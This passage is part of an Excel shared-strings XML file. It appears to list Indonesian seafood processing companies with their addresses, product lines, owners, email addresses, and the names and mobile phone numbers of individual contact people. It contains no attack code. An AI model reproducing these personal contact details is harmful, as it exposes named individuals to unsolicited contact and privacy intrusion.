  </si>
  <si>
    <t>Adhie Prasetia Nugraha</t>
  </si>
  <si>
    <t>CV. NASYA NOOR SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Suwandi Blok C No.52 RT 23, Kel. Gunung Kelua, Kec. Samarinda Ulu, Kota Samarinda</t>
  </si>
  <si>
    <t>Pempek Ikan</t>
  </si>
  <si>
    <t>Rahman Noor</t>
  </si>
  <si>
    <t>Samarinda Ulu</t>
  </si>
  <si>
    <t>Gunung Kelua</t>
  </si>
  <si>
    <t>nasyans316@gmail.com</t>
  </si>
  <si>
    <t>Rahman Noor 081258123456</t>
  </si>
  <si>
    <t>PT. MULTI PRAWN INDONESIA</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto Ds. Karangbong, Kel. Karangbong, Kec. Gedangan, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Udang Beku, Udang Rebus Beku, Udang Berlapis Tepung Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Hengki Angkodjojo</t>
  </si>
  <si>
    <t>Karangbong</t>
  </si>
  <si>
    <t>multiprawn_ind@yahoo.com</t>
  </si>
  <si>
    <t>Mahdi 0812139643460</t>
  </si>
  <si>
    <t>HARTATI YUSUF</t>
  </si>
  <si>
    <t>PT. HASIL LAUT BERSAMA</t>
  </si>
  <si>
    <t>Jl. Garuda, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Udang Kering</t>
  </si>
  <si>
    <t>Toni</t>
  </si>
  <si>
    <t>pt.hasil.laut.bersama@gmail.com</t>
  </si>
  <si>
    <t>TONI 082360085666</t>
  </si>
  <si>
    <t>PT. TEMAN LAUT</t>
  </si>
  <si>
    <t>Jl. Raya Perancis No.2 Pergudangan Pantai Indah Dadap Blok BA No.21-22, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering , Perut Ikan Kering, Teripang Kering</t>
  </si>
  <si>
    <t>Rusli</t>
  </si>
  <si>
    <t>temanlaut@yahoo.co.id</t>
  </si>
  <si>
    <t>021-55956062</t>
  </si>
  <si>
    <t>PT. SAMUDRA SEAFOOD PRODUCTS</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto No.4, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Soewandi H.T</t>
  </si>
  <si>
    <t xml:space="preserve">Bulusan </t>
  </si>
  <si>
    <t>dc@samudraseafoodproducts.com</t>
  </si>
  <si>
    <t>0333-412400</t>
  </si>
  <si>
    <t>Gigih Pramesthi 082337390838</t>
  </si>
  <si>
    <t>CV. DOLPHIN</t>
  </si>
  <si>
    <t>Kalimantan Barat</t>
  </si>
  <si>
    <t>Jl. Khatulistiwa Km 6 No.602, Kel. Batulayang, Kec. Pontianak Utara, Kota Pontianak</t>
  </si>
  <si>
    <t>Lumatan Daging, Lainnya</t>
  </si>
  <si>
    <t>Bakso Ikan, Bakso Ikan Dengan Wortel, Ikan Olahan Lapis Kulit Tahu, Kue Ikan</t>
  </si>
  <si>
    <t>Sulastri</t>
  </si>
  <si>
    <t>Pontianak Utara</t>
  </si>
  <si>
    <t>Batulayang</t>
  </si>
  <si>
    <t>cv.dolphin1033@yahoo.com</t>
  </si>
  <si>
    <t>0561-887479</t>
  </si>
  <si>
    <t>Wiwin Winarni / 082154341912</t>
  </si>
  <si>
    <t>Jl. Raya Tropodo No.126, Kel. Tropodo, Kec. Waru, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Rebus Beku, Paha Kodok Beku</t>
  </si>
  <si>
    <t>ANTON SURYONO GUNAWAN</t>
  </si>
  <si>
    <t>Tropodo</t>
  </si>
  <si>
    <t>dcr@pt-sat.com</t>
  </si>
  <si>
    <t>SRI WIDJIASTUTI 0318667575</t>
  </si>
  <si>
    <t>SRI WIDJIASTUTI</t>
  </si>
  <si>
    <t>PT. SARI USAHA MANDIRI</t>
  </si>
  <si>
    <t>Kel. Manembo-nembo, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>Meylin Maringka</t>
  </si>
  <si>
    <t xml:space="preserve">Matuari </t>
  </si>
  <si>
    <t>Manembo nembo</t>
  </si>
  <si>
    <t>Linkung20@yahoo.co.id</t>
  </si>
  <si>
    <t>0438-2230815</t>
  </si>
  <si>
    <t>Meylin Maringka 081244518890</t>
  </si>
  <si>
    <t>PT. NUTRINDO FRESFOOD INTERNASIONAL</t>
  </si>
  <si>
    <t>Lingkungan I, Kel. Tanjung Merah, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Hartono Tjandrason</t>
  </si>
  <si>
    <t>Matuari</t>
  </si>
  <si>
    <t>Tanjung Merah</t>
  </si>
  <si>
    <t>nfibitung@gmail.com</t>
  </si>
  <si>
    <t>Tedy Harmoko / 08128</t>
  </si>
  <si>
    <t>Tedy Harmoko</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT UNIT III</t>
  </si>
  <si>
    <t>Jl. KIG Raya Selatan Kav C15 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Kaleng, Beku</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Kaleng, Daging Rajungan Pasteurisasi Beku, Daging Rajungan Beku</t>
  </si>
  <si>
    <t>Mohammad Nadjikh</t>
  </si>
  <si>
    <t>adm_qa@kmlseafood.com</t>
  </si>
  <si>
    <t>Kuncoro Catur Nugroh</t>
  </si>
  <si>
    <t>Kuncoro Catur Nugroho</t>
  </si>
  <si>
    <t xml:space="preserve">SURATMAN </t>
  </si>
  <si>
    <t>Jl. Beringin Indah Timur RT 001 RW 024, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan</t>
  </si>
  <si>
    <t>Suratman</t>
  </si>
  <si>
    <t>Bintan Timur</t>
  </si>
  <si>
    <t>Kijang Kota</t>
  </si>
  <si>
    <t>suratmanskp.kkp@yahoo.com</t>
  </si>
  <si>
    <t>0813-7267-0800, 0771-462240, 0771-4610073</t>
  </si>
  <si>
    <t>KOPERASI SERBA USAHA SINAR BINTANG TERANG</t>
  </si>
  <si>
    <t>Kampung Bugis, Kel. TPI Kota, Kec. TPI Kota, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Segar, Ikan Demersal Segar, Cephalopoda Segar</t>
  </si>
  <si>
    <t>Sutomo</t>
  </si>
  <si>
    <t>haisun88@hotmail.com</t>
  </si>
  <si>
    <t>0771-316325</t>
  </si>
  <si>
    <t>Sutomo 08527220678</t>
  </si>
  <si>
    <t>HERMAN</t>
  </si>
  <si>
    <t>Kp Baru Keke RT 003 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>Herman</t>
  </si>
  <si>
    <t>hermanskp.kkp@yahoo.com</t>
  </si>
  <si>
    <t>08127732924, 0812-7779-377</t>
  </si>
  <si>
    <t>Herman 08127732924</t>
  </si>
  <si>
    <t>PT. SANANA PELANGI INDONESIA</t>
  </si>
  <si>
    <t>Desa Pohea RT 005 RW 002, Kec. Sanana Utara, Kabupaten Kepulauan Sula</t>
  </si>
  <si>
    <t>Tuna Loin Segar, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t xml:space="preserve">YEO JAEGIL </t>
  </si>
  <si>
    <t>Sanana Utara</t>
  </si>
  <si>
    <t>Pohea</t>
  </si>
  <si>
    <t>tunasanana@gmail.com</t>
  </si>
  <si>
    <t>OH SEWON 081354767</t>
  </si>
  <si>
    <t>OH SEWON</t>
  </si>
  <si>
    <t>PT. KRISPI INDUSTRI INDONESIA</t>
  </si>
  <si>
    <t>Dusun Banyu Urip RT 001 RW 001, Kel. Mojorejo, Kec. Pungging, Kabupaten Mojokerto</t>
  </si>
  <si>
    <t>Kerupuk Cumi-cumi, Kerupuk Ikan, Kerupuk Udang</t>
  </si>
  <si>
    <t>Cornelius Suminto Gondo</t>
  </si>
  <si>
    <t>Pungging</t>
  </si>
  <si>
    <t>Mojorejo</t>
  </si>
  <si>
    <t>yulianiwiyono@gmail.com</t>
  </si>
  <si>
    <t>+6281333882123 ; +6287855574123</t>
  </si>
  <si>
    <t>Yuliani Wiyono ; +62</t>
  </si>
  <si>
    <t>Yuliani Wiyono</t>
  </si>
  <si>
    <t>PT. SUMBER YALASAMUDRA</t>
  </si>
  <si>
    <t>Jl. Sampangan No.19, Kel. Desa Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Beku, Reduksi, Kaleng</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Tepung Ikan, Sarden Kaleng, Makerel Kaleng</t>
  </si>
  <si>
    <t>Widjaja Putra Tjoek</t>
  </si>
  <si>
    <t>Desa Kedungrejo</t>
  </si>
  <si>
    <t>sysmuncar@yahoo.com</t>
  </si>
  <si>
    <t>(0333) 593451, 593355</t>
  </si>
  <si>
    <t>Saori Sanimran Yusuf/085782600424</t>
  </si>
  <si>
    <t>SINAR TERANG</t>
  </si>
  <si>
    <t>Jl. M. Said Gg. Polewali, Kel. Lok Bahu, Kec. Sungai Kunjang, Kota Samarinda</t>
  </si>
  <si>
    <t>Amplang Ikan</t>
  </si>
  <si>
    <t>Samsul Ma'arif</t>
  </si>
  <si>
    <t>Sungai Kunjang</t>
  </si>
  <si>
    <t>Lok Bahu</t>
  </si>
  <si>
    <t>tsinar2@gmail.com</t>
  </si>
  <si>
    <t>Samsul Ma'rif</t>
  </si>
  <si>
    <t>PT. SURYA ADIKUMALA ABADI</t>
  </si>
  <si>
    <t>Jl. Raya Situbondo - Banyuwangi KM.17, Kel. Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>JEFRY SURYONO</t>
  </si>
  <si>
    <t>Wongsorejo</t>
  </si>
  <si>
    <t>Bangsring</t>
  </si>
  <si>
    <t>qc_saa@yahoo.com</t>
  </si>
  <si>
    <t>0333 510677</t>
  </si>
  <si>
    <t>Andi Rahmi Hatta/085257454425</t>
  </si>
  <si>
    <t>Wirawan Wijaya</t>
  </si>
  <si>
    <t>PT. SARILAUT EKATAMA</t>
  </si>
  <si>
    <t>Jl. Kalianak Barat 75 Blok E Kav 6-8, Kel. Genting Kalianak, Kec. Asemrowo, Kota Surabaya</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>TJIOE SWIE IEN</t>
  </si>
  <si>
    <t>Genting Kalianak</t>
  </si>
  <si>
    <t>sarilautekatama75@gmail.com</t>
  </si>
  <si>
    <t>031-7492458-60</t>
  </si>
  <si>
    <t>DWI FEBRIANIK 081284015856</t>
  </si>
  <si>
    <t>DWI FEBRIANIK</t>
  </si>
  <si>
    <t>PT. ANUGERAH MINA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Tuna VI Blok A No.2, Muara Baru Ujung, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Segar, Beku, Lainnya, Kering</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Pari Beku, Tuna Segar, Ikan Pelagis Segar, Kerang Hidup, Udang Kipas Beku, Lobster Beku, Telur Ikan Beku, Ikan Asin Kering, Kerang Beku, Ikan Asin Beku, Lobster Hidup, Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Siput Beku, Cephalopoda Kering, Kepiting Beku, Salmon Beku, Trout Beku, Kerang Segar, Kepiting Kulit Lunak Beku, Ikan Scombroid Beku</t>
  </si>
  <si>
    <t>Lie Stecia Juwita</t>
  </si>
  <si>
    <t>taufan.alamjaya@gmail.com</t>
  </si>
  <si>
    <t>021-66696170</t>
  </si>
  <si>
    <t>DANIEL WIDJAJA ( 0816 1718 2009 )</t>
  </si>
  <si>
    <t>Edwin Saputra</t>
  </si>
  <si>
    <t>PT. PUGUH BACHTI KARSA</t>
  </si>
  <si>
    <t>Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang</t>
  </si>
  <si>
    <t>Rajungan Segar, Cephalopoda Beku, Scallop Beku, Ikan Demersal Beku, Udang Beku, Rajungan Beku, Kepiting Beku, Tuna Beku, Ikan Pelagis Beku, Keong Beku, Fillet Ikan Segar, Bandeng Segar, Tuna Segar, Kerang Segar, Teripang Segar, Udang Kipas Segar, Lobster Segar, Udang Segar, Cephalopoda Segar, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>Ade Parlismana</t>
  </si>
  <si>
    <t>Semarang</t>
  </si>
  <si>
    <t>Mijen</t>
  </si>
  <si>
    <t>Jatibarang</t>
  </si>
  <si>
    <t>pt.puguhbachtikarsa@gmail.com</t>
  </si>
  <si>
    <t>Ade Parlismana &amp; 08122934001</t>
  </si>
  <si>
    <t>PT. HATINDO MAKMUR</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Benoa Jl. Ikan Tuna III No.2, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Demersal Segar, Tuna Segar</t>
  </si>
  <si>
    <t>Ko Shun Jung</t>
  </si>
  <si>
    <t>qa_htm15@yahoo.com</t>
  </si>
  <si>
    <t>0361-724095</t>
  </si>
  <si>
    <t>I Gede Widi Sedana / 0877 8163 9997</t>
  </si>
  <si>
    <t>Beddhi Gunawan</t>
  </si>
  <si>
    <t>UD. SAMUDRA KENCANA</t>
  </si>
  <si>
    <t>Jl. Pura Segara, Dusun Munduk , Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana</t>
  </si>
  <si>
    <t>Tepung Ikan</t>
  </si>
  <si>
    <t>Hendarto</t>
  </si>
  <si>
    <t>Pengambengan</t>
  </si>
  <si>
    <t>udsamudrakencana@yahoo.com</t>
  </si>
  <si>
    <t>0365 41904</t>
  </si>
  <si>
    <t>Hendarto 08123980633</t>
  </si>
  <si>
    <t>PT. GOLDEN TUNA</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Barat II - Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Fillet Beku</t>
  </si>
  <si>
    <t>qcgoldentuna@hotmail.com</t>
  </si>
  <si>
    <t>0361-4480232</t>
  </si>
  <si>
    <t>ANNY 08123812780</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT UNIT KENDARI</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Samudera Jl. Samudera No. 1, Kel. Puday, Kec. Abeli, Kota Kendari</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Tuna Loin Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>M. NADJIKH</t>
  </si>
  <si>
    <t>kml.kdi03@gmail.com</t>
  </si>
  <si>
    <t>(0401) 3198318</t>
  </si>
  <si>
    <t>Joko Margono</t>
  </si>
  <si>
    <t>Wisnu Purbo H</t>
  </si>
  <si>
    <t>PT. KOIN BUMI</t>
  </si>
  <si>
    <t>Jl. Raya Karanggan RT 001 RW 003, Kel. Puspasari, Kec. Citeureup, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Tiram Beku, Cumi-cumi Kering, Nori, Sea Squirt Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>KIM WOO JAE</t>
  </si>
  <si>
    <t>Citeureup</t>
  </si>
  <si>
    <t>Puspasari</t>
  </si>
  <si>
    <t>hrd.mgh43@gmail.com</t>
  </si>
  <si>
    <t>021 87920992</t>
  </si>
  <si>
    <t>Kamsul Idris ( 085210981875 )</t>
  </si>
  <si>
    <t>NICOLAS PUTRA JAYA KIM</t>
  </si>
  <si>
    <t>PT. SAMUDERA INDONESIA COLDSTORINDO</t>
  </si>
  <si>
    <t>Kawasan Industri Karyadeka Panca Murni Kav C2 Kp. Pasir Konci RT 015 RW 005, Kel. Pasir Sari, Kec. Cikarang Selatan, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Beku</t>
  </si>
  <si>
    <t>HERRY YANTO</t>
  </si>
  <si>
    <t>Pasir Sari</t>
  </si>
  <si>
    <t>ndrosiana@gmail.com</t>
  </si>
  <si>
    <t>SETIA AGUSTINA 082310028280</t>
  </si>
  <si>
    <t>TONY THOMAS</t>
  </si>
  <si>
    <t>PT. SOUTHERN MARINE PRODUCTS</t>
  </si>
  <si>
    <t>Jl. Brantas KM 2, Kel. Pilang, Kec. Kademangan, Kota Probolinggo</t>
  </si>
  <si>
    <t>Surimi Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>LEE SHENG CHIH</t>
  </si>
  <si>
    <t>Kademangan</t>
  </si>
  <si>
    <t>Pilang</t>
  </si>
  <si>
    <t>osouthernmp@gmail.com</t>
  </si>
  <si>
    <t>0335-422777</t>
  </si>
  <si>
    <t xml:space="preserve">Agus Amin Thohari - </t>
  </si>
  <si>
    <t>AGUS AMIN THOHARI</t>
  </si>
  <si>
    <t>PT. SULTRATUNA SAMUDRA</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Samudera Kendari, Jl. Samudera No.1, Kel. Puday, Kec. Abeli, Kota Kendari</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Cephalopoda Rebus Beku, Udang Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>SUTRISNO WIJAYA, HARYANTO TEDJA</t>
  </si>
  <si>
    <t>sstuna.adm@gmail.com</t>
  </si>
  <si>
    <t>0401-3194357, 0401-3194358</t>
  </si>
  <si>
    <t>Djuwariah 081245760759</t>
  </si>
  <si>
    <t>SUTRISNO WIJAYA, SUWONDO WIJAYA</t>
  </si>
  <si>
    <t>MAWAR LESTARI</t>
  </si>
  <si>
    <t>Jl. Moch Roem RT 03, Kel. Bontang Lestari, Kec. Bontang Selatan, Kota Bontang</t>
  </si>
  <si>
    <t>Amplang Ikan, Snack Ikan, Abon Ikan</t>
  </si>
  <si>
    <t>Maryam</t>
  </si>
  <si>
    <t>Bontang Selatan</t>
  </si>
  <si>
    <t>Bontang Lestari</t>
  </si>
  <si>
    <t>mawar.lestari.btg@gmail.com</t>
  </si>
  <si>
    <t>Maryam/081346426683</t>
  </si>
  <si>
    <t>PT. BLAMBANGAN FOODPACKERS INDONESIA</t>
  </si>
  <si>
    <t>Jl. Sampangan No. 1, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Tuna Kaleng, Sarden Kaleng, Makerel Kaleng, Daging Bekicot Kaleng</t>
  </si>
  <si>
    <t>DARREN SOERO D. SOETANTYO</t>
  </si>
  <si>
    <t>pt.bfpi@yahoo.co.id</t>
  </si>
  <si>
    <t>0333 593479</t>
  </si>
  <si>
    <t>DESY/ 083847203390</t>
  </si>
  <si>
    <t>I PUTU GEDE WIRIANA</t>
  </si>
  <si>
    <t>PT. ARIAKE EUROPE INDONESIA</t>
  </si>
  <si>
    <t>Kawasan Greenland International Industrial Center (GIIC) Blok CF No.7 Kota Deltamas, Kel. Pasir Ranji, Kec. Cikarang Pusat, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Kering, Fermentasi, Reduksi, Beku</t>
  </si>
  <si>
    <t>Tepung Udang, Kecap Udang, Ekstrak Udang, Tepung Krill, Ekstrak Krill, Minyak Perisa Udang, Krill Beku</t>
  </si>
  <si>
    <t>Kineo Okada</t>
  </si>
  <si>
    <t>Cikarang Pusat</t>
  </si>
  <si>
    <t>Pasir Ranji</t>
  </si>
  <si>
    <t>septian.f@ariake-id.com</t>
  </si>
  <si>
    <t>Mardhiana Sari (081381826619)</t>
  </si>
  <si>
    <t>Masaharu Nishi</t>
  </si>
  <si>
    <t>PD. MAJU JAYA</t>
  </si>
  <si>
    <t>Jl. Adi Sucipto Belakang Eks Bioskop Indah Raya Km 5,8, Kel. Sungai Raya, Kec. Sungai Raya, Kabupaten Kubu Raya</t>
  </si>
  <si>
    <t>Udang Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Cephalopoda Segar</t>
  </si>
  <si>
    <t>RUDI</t>
  </si>
  <si>
    <t>Sungai Raya</t>
  </si>
  <si>
    <t>denijepredi70@gmail.com</t>
  </si>
  <si>
    <t>PT. LAUTAN MUTIARA JAYA</t>
  </si>
  <si>
    <t>Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Lainnya, Beku, Kering, Segar</t>
  </si>
  <si>
    <t>Lobster Hidup, Cephalopoda Beku, Ikan Pelagis Beku, Kepiting Beku, Udang Beku, Ikan Demersal Beku, Tuna Beku, Kerang Beku, Hiu Beku, Ikan Asin Kering, Sirip Hiu Kering, Ubur-ubur Asin, Ikan Demersal Segar, Bandeng Beku, Daging Tuna Beku, Udang Segar, Kerang Segar, Hiu Segar, Pari Beku, Kerang Hidup, Kepiting Hidup, Udang Hidup, Kerapu Hidup</t>
  </si>
  <si>
    <t>Anton Wijaya</t>
  </si>
  <si>
    <t>duta.lautanmutiara@gmail.com</t>
  </si>
  <si>
    <t>021-6630035</t>
  </si>
  <si>
    <t>Samsul Bachkri Siregar 082165293719</t>
  </si>
  <si>
    <t>Samsul Bakhri Siregar</t>
  </si>
  <si>
    <t>CV. SINAR MUTIARA ABADI</t>
  </si>
  <si>
    <t>Jl. Gajah Mada Km 4, Kel. Banyudono, Kec. Kaliori, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Surimi Beku</t>
  </si>
  <si>
    <t>LIM YUNIARTI</t>
  </si>
  <si>
    <t>Kaliori</t>
  </si>
  <si>
    <t>Banyudono</t>
  </si>
  <si>
    <t>cvsinarmutiara994@yahoo.co.id</t>
  </si>
  <si>
    <t>0295 - 692910</t>
  </si>
  <si>
    <t>LIM TANTO WIJOYO 081</t>
  </si>
  <si>
    <t>LIM TANTO WIJOYO</t>
  </si>
  <si>
    <t>PT. TRI SATRIA SAMUDRA</t>
  </si>
  <si>
    <t>Jl. Sultan Hasanudin Kompleks Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>VIVI PABULA</t>
  </si>
  <si>
    <t>Sirimau</t>
  </si>
  <si>
    <t>Pandan Kasturi</t>
  </si>
  <si>
    <t>tsspanorama@yahoo.com</t>
  </si>
  <si>
    <t>0911-351884, 0911-347717</t>
  </si>
  <si>
    <t>Wawan 085243009698, Toni Pabula 085824631597</t>
  </si>
  <si>
    <t>CV. FIRDALI SEJAHTERA</t>
  </si>
  <si>
    <t>Room 2 Gudang 77 Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Tuna IV, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Daging Tuna Beku, Salmon Beku, Trout Beku, Kerang Beku</t>
  </si>
  <si>
    <t>Iis Ratnaningsih</t>
  </si>
  <si>
    <t>faniex@gmail.com</t>
  </si>
  <si>
    <t>021-3505994</t>
  </si>
  <si>
    <t>MUH. KURNIADI ASMI 082306360111</t>
  </si>
  <si>
    <t>PT. ABADI PERMAI</t>
  </si>
  <si>
    <t>Jl. Timor Timur No.5 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering , Gelembung Ikan Kering, Teripang Kering</t>
  </si>
  <si>
    <t>Ngadiman Ng</t>
  </si>
  <si>
    <t>Medan Deli</t>
  </si>
  <si>
    <t>Mabar</t>
  </si>
  <si>
    <t>ij6286574@gmail.com</t>
  </si>
  <si>
    <t>Kevin Winarto</t>
  </si>
  <si>
    <t>PT. GUMINDO PERKASA INDSUTRI</t>
  </si>
  <si>
    <t>Kampung Penggoreng, Kel. Mangunreja, Kec. Pulo Ampel, Kabupaten Serang</t>
  </si>
  <si>
    <t>Semi Refined Carrageenan, Refined Carrageenan</t>
  </si>
  <si>
    <t>Zulnovri</t>
  </si>
  <si>
    <t>Pulo Ampel</t>
  </si>
  <si>
    <t>Mangunreja</t>
  </si>
  <si>
    <t>suyatno@indogum.com</t>
  </si>
  <si>
    <t>Zulnofri / 081383909048</t>
  </si>
  <si>
    <t>Ir.AA Juli Santoso Wibowo</t>
  </si>
  <si>
    <t>PT. SINDABAD MARINE PIONEER</t>
  </si>
  <si>
    <t>Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Beku, Kering, Segar</t>
  </si>
  <si>
    <t>Udang Beku, Telur Ikan Terbang Beku, Telur Ikan Terbang Kering, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Hasil Budidaya Beku, Kepiting Beku, Cephalopoda Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Ikan Segar Hasil Budidaya, Udang Segar, Kepiting Segar</t>
  </si>
  <si>
    <t>LEE JAE WON</t>
  </si>
  <si>
    <t>Pandean</t>
  </si>
  <si>
    <t>sindabadmp@gmail.com</t>
  </si>
  <si>
    <t>0343-4742525</t>
  </si>
  <si>
    <t>LEE JAE WON &amp; 081296</t>
  </si>
  <si>
    <t>PT. ALAM JAYA</t>
  </si>
  <si>
    <t>JL. Rungkut Industri II/25, Kel. Tenggilis Mejoyo, Kec. Tenggilis Mejoyo, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Air Tawar Beku, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>HANDANI SASMITA</t>
  </si>
  <si>
    <t>Tenggilis Mejoyo</t>
  </si>
  <si>
    <t>alamjaya.qc@gmail.com</t>
  </si>
  <si>
    <t>DEDI SUKANTO 0812321</t>
  </si>
  <si>
    <t>DEDI SUKANTO</t>
  </si>
  <si>
    <t>PT. LAUT BIRU INDONESIA TIMUR</t>
  </si>
  <si>
    <t>Jl. Terusan Bandengan Utara No. 95 Blok E No. 6 RT 003 RW 016, Kel. Pejagalan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Kulit Ikan Kering</t>
  </si>
  <si>
    <t>KASTONO</t>
  </si>
  <si>
    <t>Pejagalan</t>
  </si>
  <si>
    <t>andre_ronaldo2000@yahoo.com</t>
  </si>
  <si>
    <t>ANDRE &amp; 0817130079</t>
  </si>
  <si>
    <t>PT. MULTI MINA PERSADA</t>
  </si>
  <si>
    <t>Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Telur Ikan Terbang Beku, Telur Ikan Terbang Kering, Ikan Air Tawar Beku, Tuna Beku, Tuna Loin Beku, Kerang Beku</t>
  </si>
  <si>
    <t>TAUFIT HIDAYAT</t>
  </si>
  <si>
    <t>rusdiudhy55@gmail.com</t>
  </si>
  <si>
    <t>ALAM &amp; 085218322199</t>
  </si>
  <si>
    <t>MUH FIRDAUS</t>
  </si>
  <si>
    <t>PT. LUCKY SAMUDRA PRATAMA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Salmon Segar, Hiu Beku, Salmon Beku, Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Segar, Telur Ikan Terbang Beku, Telur Ikan Terbang Kering, Rumput Laut Beku, Pari Beku, Hiu Segar, Pari Segar</t>
  </si>
  <si>
    <t>Tsai Wen Hsiung</t>
  </si>
  <si>
    <t>marketing@luckysamudra.com</t>
  </si>
  <si>
    <t>021-6623275, 021-66690387</t>
  </si>
  <si>
    <t>Nurleli 082125803438</t>
  </si>
  <si>
    <t>K Wisnu Putra</t>
  </si>
  <si>
    <t>CV. VICTORY FRIENDCIPLE</t>
  </si>
  <si>
    <t>Jl. Tuna 2 Blok K No. 7B Room C, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>victory_friendciple@yahoo.co.id</t>
  </si>
  <si>
    <t>021-88860422</t>
  </si>
  <si>
    <t>BOY</t>
  </si>
  <si>
    <t>VICTOR TOBING</t>
  </si>
  <si>
    <t>CV. ADI MINA MAKMUR</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso Sipung RT 001 RW 004, Kel. Karangasem Utara, Kec. Batang, Kabupaten Batang</t>
  </si>
  <si>
